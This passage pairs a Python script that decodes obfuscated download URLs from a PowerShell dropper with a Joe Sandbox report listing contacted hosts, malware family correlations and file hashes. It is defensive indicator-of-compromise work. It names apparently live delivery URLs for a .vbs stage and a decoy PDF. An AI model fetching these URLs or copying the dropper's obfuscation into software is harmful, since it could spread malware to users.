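# Copied from the report's memory strings (process 0, powershell.exe). The second
# string is cut off in the dump ("...sua7rvicua7s.p") and is kept exactly as dumped.
MEMORY_STRINGS = [
    "http://www.bluua7maxxlasua7r.com/ms/ms.vbs",
    "https://www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.p",
]

# Copied from the report's contacted-domains table.
OBSERVED_HOSTS = {
    "www.bluemaxxlaser.com",
    "astenterprises.com.pk",
    "www.astenterprises.com.pk",
    "x1.i.lencr.org",
}

# Copied from the report's contacted-URLs table (requests seen on the wire).
OBSERVED_URLS = [
    "http://www.bluemaxxlaser.com/ms/ms.vbs",
    "https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf",
]

TOKEN = "ua7"  # the substring the sample writes in place of one letter


def deobfuscate(s, token=TOKEN, letter="e"):
    """Undo the substitution: every occurrence of `token` stands for `letter`."""
    return s.replace(token, letter)


def infer_letter(obf, hosts, token=TOKEN):
    """Work out which letter the token replaces without reading the script.

    Each candidate letter is substituted and the resulting hostname is checked
    against the hosts the sandbox resolved; the first hit wins. Returns None
    when no candidate yields a known host.
    """
    for letter in string.ascii_lowercase:
        host = urlsplit(obf.replace(token, letter)).hostname
        if host in hosts:
            return letter
    return None


def extract_iocs(url):
    """Split a URL into the fields a blocklist or hunt query wants."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    return {
        "scheme": parts.scheme,
        "host": parts.hostname,
        "path": path,
        "filename": path.rsplit("/", 1)[-1],
    }


def recover_all(memory_strings=MEMORY_STRINGS, hosts=OBSERVED_HOSTS, observed=OBSERVED_URLS):
    """Deobfuscate each memory string and record whether a wire-observed URL confirms it.

    Confirmation is a prefix match, because strings carved from memory dumps
    are frequently truncated (as the second one here is).
    """
    results = []
    for s in memory_strings:
        letter = infer_letter(s, hosts)
        clear = deobfuscate(s, letter=letter) if letter else None
        confirmed = bool(clear) and any(u.startswith(clear) for u in observed)
        results.append({"obfuscated": s, "letter": letter, "url": clear, "confirmed": confirmed})
    return results


if __name__ == "__main__":
    for r in recover_all():
        status = "confirmed by network trace" if r["confirmed"] else "unconfirmed"
        print(f"{r['obfuscated']}\n  -> {r['url']} ({status})")
        if r["url"]:
            print("  ", extract_iocs(r["url"]))
```

Inferring the letter from resolved hostnames, rather than hard-coding "e", is what makes the same routine reusable on the next variant of this dropper; the sandbox's DNS table is the ground truth, and the memory string only has to be brought into agreement with it.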
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
astenterprises.com.pk | 107.161.23.150 | true | false | - | high
www.bluemaxxlaser.com | 203.175.174.69 | true | false | - | high
x1.i.lencr.org | unknown | unknown | false | - | high
www.astenterprises.com.pk | unknown | unknown | false | - | high

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | - | high
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | - | high

Reading note: x1.i.lencr.org is Let's Encrypt certificate-chain infrastructure, reached while Windows validated the certificate for the port-443 connection; it is not an attacker host. "Reputation: high" and "Malicious: false" are verdicts on the hosting domains, not on what they served: the first URL delivers a .vbs (the file type the hidden child powershell.exe later runs from %public%), and the second delivers the PDF that Acrobat.exe opens from the Desktop under the same name, the decoy shown to the user.
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.6.dr | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B8130E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ms/List | powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.p | powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.2325977680.000001E9B0412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000007.00000003.2275115760.000002AEC5FD0000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr | false | | high
http://crl.ver) | svchost.exe, 00000007.00000002.3371178265.000002AEC628D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.bluua7maxxlasua7r.com/ms/ms.vbs | powershell.exe, 00000000.00000002.2325977680.000001E9AFA12000.00000004.00000800.00020000.00000000.sdmp, raEyjKggAf.ps1 | true | Avira URL Cloud: safe | unknown
http://www.microsoft.cox | powershell.exe, 00000000.00000002.2420839801.000001E9C7A10000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://astenterprises.com.pk | powershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000003.00000002.2207789222.0000018BEFC0C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | edb.log.7.dr | false | | high
https://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.2325977680.000001E9B12BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bluemaxxlaser.com | powershell.exe, 00000000.00000002.2325977680.000001E9B12FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B1358000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
203.175.174.69 | www.bluemaxxlaser.com | Singapore | 24482 | SGGS-AS-APSGGSSG | false
107.161.23.150 | astenterprises.com.pk | United States | 3842 | RAMNODEUS | false
                                                                    IP
                                                                    127.0.0.1
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1578234
                                                                    Start date and time:2024-12-19 12:51:43 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 17s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:15
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:raEyjKggAf.ps1
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270.ps1
                                                                    Detection:MAL
                                                                    Classification:mal84.evad.winPS1@20/59@5/3
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 7
                                                                    • Number of non-executed functions: 2
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .ps1
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 23.218.208.109, 23.195.61.56, 2.19.198.16, 23.32.239.65, 23.32.239.9, 23.32.239.56, 23.195.39.65, 2.19.198.27, 13.107.246.63, 20.12.23.50, 23.47.168.24
                                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                    • Execution Graph export aborted for target powershell.exe, PID 2244 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 64 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:52:36 | API Interceptor | 64x Sleep call for process: powershell.exe modified
06:52:49 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:53:00 | API Interceptor | 1x Sleep call for process: AcroCEF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.175.174.69 | gCXzb0K8Ci.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | H2PspQWoHE.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | H6epOhxoPY.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | KcKtHBkskI.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 1M1QoJF40r.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 8iAcoQLc3o.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | R7FBVcp1tf.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 2rTi9MgX25.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | fs8cRx6Us2.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | ER4HMMzeQ3.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
107.161.23.150 | F8HYX5HOgA.vbs | malicious | GuLoader, RHADAMANTHYS |
107.161.23.150 | gCXzb0K8Ci.ps1 | malicious | Unknown |
107.161.23.150 | H2PspQWoHE.ps1 | malicious | Unknown |
107.161.23.150 | H6epOhxoPY.ps1 | malicious | Unknown |
107.161.23.150 | KcKtHBkskI.ps1 | malicious | Unknown |
107.161.23.150 | 1M1QoJF40r.ps1 | malicious | Unknown |
107.161.23.150 | 8iAcoQLc3o.ps1 | malicious | Unknown |
107.161.23.150 | R7FBVcp1tf.ps1 | malicious | Unknown |
107.161.23.150 | 2rTi9MgX25.ps1 | malicious | Unknown |
107.161.23.150 | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.bluemaxxlaser.com | gCXzb0K8Ci.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | H2PspQWoHE.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | H6epOhxoPY.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | KcKtHBkskI.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | 1M1QoJF40r.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | 8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | 2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RAMNODEUS | F8HYX5HOgA.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
RAMNODEUS | gCXzb0K8Ci.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | H2PspQWoHE.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | H6epOhxoPY.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | KcKtHBkskI.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | 1M1QoJF40r.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
SGGS-AS-APSGGSSG | gCXzb0K8Ci.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | H2PspQWoHE.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | H6epOhxoPY.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | KcKtHBkskI.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | 1M1QoJF40r.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | 8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | 2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | gCXzb0K8Ci.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | H2PspQWoHE.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 0iTxQouy7k.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | H6epOhxoPY.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | KcKtHBkskI.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 1M1QoJF40r.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | StGx54oFh6.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150
                                                                                        No context
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7263164601429241
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0F:9JZj5MiKNnNhoxuw
                                                                                        MD5:4542F2FCC3281CB1DB5097DF9ECC07CF
                                                                                        SHA1:FDCE0ED5ED6923D441B97410C2252C49C91BF803
                                                                                        SHA-256:AED563D241EC3D9DE155B541907F5C0776DE46D35FBC1B9D3925ED1C59E6A294
                                                                                        SHA-512:18A8EFE36509F81C430F311BB63805756EA117AA5E704B72647560F7BC94971EEEE26E60BB06081187CCD063E2874F71B01E88DB925A576E1874FB50DB4C86F8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0xdf08333d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7555524224807735
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                                        MD5:D2A1C8D652EE95BD98E62A901D6E7F02
                                                                                        SHA1:2904A329C1C92C8311A7740FA0156BE8CD3B20EE
                                                                                        SHA-256:329E802449866D54015FB367DC1326F1A9A585947D9562B487C1FE3EAD0812C0
                                                                                        SHA-512:70103818AC0795AF9FD7DDF153315965FBC4B2F4FC854433BE9D3E622C00AA29FC509AE8C0B68B453DD43F46EF99F52149DCFD8FB8D8C4B3B097F1305BF54D0A
                                                                                        Malicious:false
                                                                                        Preview:..3=... .......7.......X\...;...{......................0.e......!...{?.14...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.....................................u14...|..................W...14...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.07993319940693144
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:d5llEYejdZ2373NaAPaU1lbb+2GltAlluxmO+l/SNxOf:fEzjd8TNDPaUH+2QtAgmOH
                                                                                        MD5:D3426B53E891F688EB397C3B3E248FD9
                                                                                        SHA1:EFBD69D15674F577561B2D627E6B4BC5429F9608
                                                                                        SHA-256:15D0A2876974076BCE7397DEAEEA9A6D8A1D62165C991DC0B89FD4CEB1D4B9C2
                                                                                        SHA-512:8FD80E58A3FF730BD25B8387BAF7B74A2936B9885FD596BEEEA72ACA00B60AC80B03B01776E4054D6E2755B6874E82D9BAC1C2A0622C919C4028D24BD966AA06
                                                                                        Malicious:false
                                                                                        Preview:,........................................;...{..14...|...!...{?..........!...{?..!...{?..g...!...{?.................W...14...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.251956511157485
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IFOq2PN72nKuAl9OmbnIFUt8OIKZZmw+OIKzkwON72nKuAl9OmbjLJ:7pvVaHAahFUt8O7/+OR5OaHAaSJ
                                                                                        MD5:A33A495DC05721F9FC8648BCA8A73CD1
                                                                                        SHA1:1DF8F61A0241E6E54B8B12F7E1252044514B36C1
                                                                                        SHA-256:88B2B6B18CCD41D2A5A89D5F441D9592C5F7207203C9F70C82B629080EB24068
                                                                                        SHA-512:C184ED7DA2F7AF636933C3FE31CC957281C28C1CE6A7FD466DA126793260F27DD5D897DF15BAB932FF93EFFB0BB1FED2D7D57F2EBEA06EFB481C438DFF55CB05
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.784 ba0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:52:48.787 ba0 Recovering log #3.2024/12/19-06:52:48.787 ba0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.251956511157485
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IFOq2PN72nKuAl9OmbnIFUt8OIKZZmw+OIKzkwON72nKuAl9OmbjLJ:7pvVaHAahFUt8O7/+OR5OaHAaSJ
                                                                                        MD5:A33A495DC05721F9FC8648BCA8A73CD1
                                                                                        SHA1:1DF8F61A0241E6E54B8B12F7E1252044514B36C1
                                                                                        SHA-256:88B2B6B18CCD41D2A5A89D5F441D9592C5F7207203C9F70C82B629080EB24068
                                                                                        SHA-512:C184ED7DA2F7AF636933C3FE31CC957281C28C1CE6A7FD466DA126793260F27DD5D897DF15BAB932FF93EFFB0BB1FED2D7D57F2EBEA06EFB481C438DFF55CB05
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.784 ba0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:52:48.787 ba0 Recovering log #3.2024/12/19-06:52:48.787 ba0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):342
                                                                                        Entropy (8bit):5.2026918456977365
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IQ4+q2PN72nKuAl9Ombzo2jMGIFUt8OIhWZmw+OIB4SNVkwON72nKuAl9Ombzos:7l4+vVaHAa8uFUt8On/+Oo4SNV5OaHAv
                                                                                        MD5:FA1D19C1D63D653CE62D4B870F5DA20F
                                                                                        SHA1:E844A964823E4ECA7D85820DB9C6E6A8BEC41270
                                                                                        SHA-256:0D0EF1A76DE99D10AFEC282D62E4D96202963E311A156812798AA86CE8FA36FB
                                                                                        SHA-512:FE2A20257A646CF4464A515DE18551EBD70F249BC536A80ACFAEE2FB0BAC7D038527417FEE167D23BF9084F326A5219BF0E445977F43C12497019703FFA27D7A
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.969 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:52:48.971 120c Recovering log #3.2024/12/19-06:52:48.972 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):342
                                                                                        Entropy (8bit):5.2026918456977365
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IQ4+q2PN72nKuAl9Ombzo2jMGIFUt8OIhWZmw+OIB4SNVkwON72nKuAl9Ombzos:7l4+vVaHAa8uFUt8On/+Oo4SNV5OaHAv
                                                                                        MD5:FA1D19C1D63D653CE62D4B870F5DA20F
                                                                                        SHA1:E844A964823E4ECA7D85820DB9C6E6A8BEC41270
                                                                                        SHA-256:0D0EF1A76DE99D10AFEC282D62E4D96202963E311A156812798AA86CE8FA36FB
                                                                                        SHA-512:FE2A20257A646CF4464A515DE18551EBD70F249BC536A80ACFAEE2FB0BAC7D038527417FEE167D23BF9084F326A5219BF0E445977F43C12497019703FFA27D7A
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.969 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:52:48.971 120c Recovering log #3.2024/12/19-06:52:48.972 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.971824627296864
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.971824627296864
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                        Malicious:false
